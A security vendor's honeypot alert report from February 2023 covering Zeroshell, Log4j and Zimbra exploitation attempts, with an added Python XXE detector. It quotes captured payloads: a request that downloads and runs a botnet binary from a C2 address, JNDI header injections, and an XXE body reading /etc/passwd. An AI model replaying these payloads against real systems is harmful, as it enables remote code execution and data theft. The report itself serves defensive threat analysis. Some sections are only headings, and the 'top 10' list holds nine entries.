Our selection of alerts on honeypots: report 4 – February 2023

These past two weeks, international TEHTRIS honeypots got relentlessly hit again by suspected malicious activities. The honeypots located in Southeast America, in South and Northeast Asia Pacific and in Western Europe were the most targeted. Here is an extract of some of the attack attempts that were detected.

Attempts to exploit CVE-2019-12725 on German and Portuguese honeypots

Two malicious IP addresses were detected by TEHTRIS NTA performing inbound Zeroshell remote code execution (RCE) attempts. Some of our European honeypots could have been compromised through CVE-2019-12725 (CVSSv3: 9.8).

The US IP 4.71.37[.]46, hosted by AS 3356 LEVEL3, performed several dozen hits on the German and Portuguese honeypots. This IP address is listed in public databases of malicious IP addresses.

The Chinese IP 36.110.214[.]195, hosted by AS 23724 IDC, China Telecommunications Corporation, is not listed in public databases of malicious IPs. This IP performed only one hit, on a German honeypot.

This specific URL carries the download step for the Zero botnet payload:

GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0

URL decode: “;cd /tmp;curl -O http://5.206.227[.]228/zero;sh zero;”

The IP address 5.206.227[.]228 in the packet above, likely a C2, is a Portuguese address already known for Zeroshell exploitation. It is hosted by AS 47674 Net Solutions – Consultoria Em Tecnologias De Informacao, Sociedade Unipessoal LDA.

Log4j exploit attempts on a Swedish honeypot

One of our Swedish honeypots has been the target of loads of “jndi” requests, which are known for being used in attempts to exploit the Log4j vulnerability on devices.

27 IP addresses sent requests carrying the following set of headers, which was the one most frequently seen:

['origin: $ {jndi:ldap://:8182/a}', 'x-api-version: $ {jndi:ldap://:8182/a}', 'x-att-deviceid: $ {jndi:ldap://:8182/a}', 'proxy-connection: $ {jndi:ldap://:8182/a}', 'prefer: $ {jndi:ldap://:8182/a}', 'accept: */*', 'upgrade-insecure-requests: $ {jndi:ldap://:8182/a}', 'warning: $ {jndi:ldap://:8182/a}', 'a-im: $ {jndi:ldap://:8182/a}', 'x-request-id: $ {jndi:ldap://:8182/a}', 'from: $ {jndi:ldap://:8182/a}', 'forwarded: $ {jndi:ldap://:8182/a}', 'access-control-request-method: $ {jndi:ldap://:8182/a}', 'dnt: $ {jndi:ldap://:8182/a}', 'cache-control: $ {jndi:ldap://:8182/a}', 'x-uidh: $ {jndi:ldap://:8182/a}', 'authorization: $ {jndi:ldap://:8182/a}', 'accept-encoding: gzip', 'x-wap-profile: $ {jndi:ldap://:8182/a}', 'access-control-request-headers: $ {jndi:ldap://:8182/a}', 'x-forwarded-proto: $ {jndi:ldap://:8182/a}', 'pragma: $ {jndi:ldap://:8182/a}', 'date: $ {jndi:ldap://:8182/a}', 'x-forwarded-host: $ {jndi:ldap://:8182/a}', 'x-correlation-id: $ {jndi:ldap://:8182/a}', 'x-requested-with: $ {jndi:ldap://:8182/a}', 'front-end-https: $ {jndi:ldap://:8182/a}', 'http2-settings: $ {jndi:ldap://:8182/a}', 'x-csrf-token: $ {jndi:ldap://:8182/a}']

The other header sets seen look exactly the same, except for the port number 8182, which varies between 8180 and 8189.

Here are the top 10 IoCs, all listed in public databases of malicious IPs:

IP address – AS – Country
93.91.117[.]60 – AS 47562 Fast Link Ltd – RU
120.236.74[.]234 – AS 9808 China Mobile Communications Group Co., Ltd. – CN
85.51.217[.]156 – AS 12479 Orange Espagne SA – ES
(IP address not given) – AS 4766 Korea Telecom – KR
72.132.58[.]237 – AS 20001 TWC-20001-PACWEST – US
178.140.136[.]178 – AS 42610 Rostelecom – RU
223.171.91[.]144 – AS 17853 LGTELECOM – KR
46.170.151[.]34 – AS 5617 Orange Polska Spolka Akcyjna – PL
147.182.233[.]56 – AS 14061 DIGITALOCEAN-ASN – US

Attempts to exploit CVE-2019-9621 on European honeypots by a Russian IP

Thanks to TEHTRIS NTA, which automatically detects anomalies in traffic, we monitored over these past two weeks an increase in attempts to exploit CVE-2019-9621 (CVSSv3: 7.5), which affects Zimbra versions below 8.8.11. Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows server-side request forgery (SSRF) and XML External Entity (XXE) injection via the ProxyServlet component.

The Russian IP address 152.89.196[.]211 (AS 57523 Chang Way Technologies Co. Limited) performed hundreds of actions against all our TEHTRIS European honeypots during this second half of February. This IP, identified as malicious in public databases, started to attack our honeypots on the 10th of January.

Here is one example of the requests seen in an NTA packet:

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: xx.x.xxx.xx:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length: 314
Content-Type: application/xml
Accept-Encoding: gzip
Connection: close

<!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>

The DOCTYPE line declaring the external entity is an attempt to read the file /etc/passwd, which notably contains the list of users of the machine; the entity is then referenced in AcceptableResponseSchema so its content is echoed back in the response.
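As an added example (not TEHTRIS code, and not part of the original report), the Python below shows two things a defender would want around this request: a detector that flags an XXE attempt in an XML request body by pairing declared external entities with the places they are referenced, and a parse wrapper that refuses any body carrying a DTD before it reaches the XML parser, which removes the entity resolution the attack depends on. The two bodies are constructed: the first reproduces the DOCTYPE and structure quoted above, the second is a benign Autodiscover request with a placeholder address.

```python
import re
import xml.etree.ElementTree as ET

# Constructed request bodies (not from a real capture): the first mirrors the
# Autodiscover POST quoted in the report, the second is a benign request.
XXE_BODY = (
    '<!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    '<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">'
    '<Request><EMailAddress>aaaaa</EMailAddress>'
    '<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>'
)
BENIGN_BODY = (
    '<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">'
    '<Request><EMailAddress>user@example.com</EMailAddress>'
    '<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a'
    '</AcceptableResponseSchema></Request></Autodiscover>'
)

DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)
# General or parameter entity declared with an external (SYSTEM/PUBLIC) identifier
EXTERNAL_ENTITY = re.compile(
    r'<!ENTITY\s+(?:%\s+)?(\w+)\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([^"]*)"', re.I)
ENTITY_REF = re.compile(r"&(\w+);")


def detect_xxe(body):
    """Return XXE indicators for an XML request body.

    external_entities maps entity name -> external URI; referenced_targets lists
    the URIs of entities that are actually expanded somewhere in the document.
    """
    entities = {name: uri for name, uri in EXTERNAL_ENTITY.findall(body)}
    referenced = [n for n in ENTITY_REF.findall(body) if n in entities]
    return {
        "has_doctype": bool(DOCTYPE.search(body)),
        "external_entities": entities,
        "referenced_targets": [entities[n] for n in referenced],
    }


def parse_without_dtd(body):
    """Reject any body carrying a DTD, then parse and return the root element's tag.

    Refusing the DOCTYPE up front means no entity (internal, external or
    parameter) can ever be declared, whatever the underlying parser's defaults.
    """
    if DOCTYPE.search(body):
        raise ValueError("DTD not allowed in request body")
    return ET.fromstring(body).tag


if __name__ == "__main__":
    print(detect_xxe(XXE_BODY))
    print(parse_without_dtd(BENIGN_BODY))
```

Rejecting the DOCTYPE outright is simpler and safer than trying to distinguish harmless DTDs from hostile ones; an Autodiscover endpoint has no reason to accept one, and the detector's referenced_targets field gives the analyst the file or URL the request tried to pull, here file:///etc/passwd, straight from the alert.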

Attempts to exploit CVE-2019-16759 & CVE-2020-17496 on an Italian honeypot

Hardworking Bulgarian threat actors?

Masscan, an open-source scanner widely used

Information remains TEHTRIS’ sole property and reproduction is forbidden

TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.

No warranty and liability

TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assumes no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied, regarding the accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.
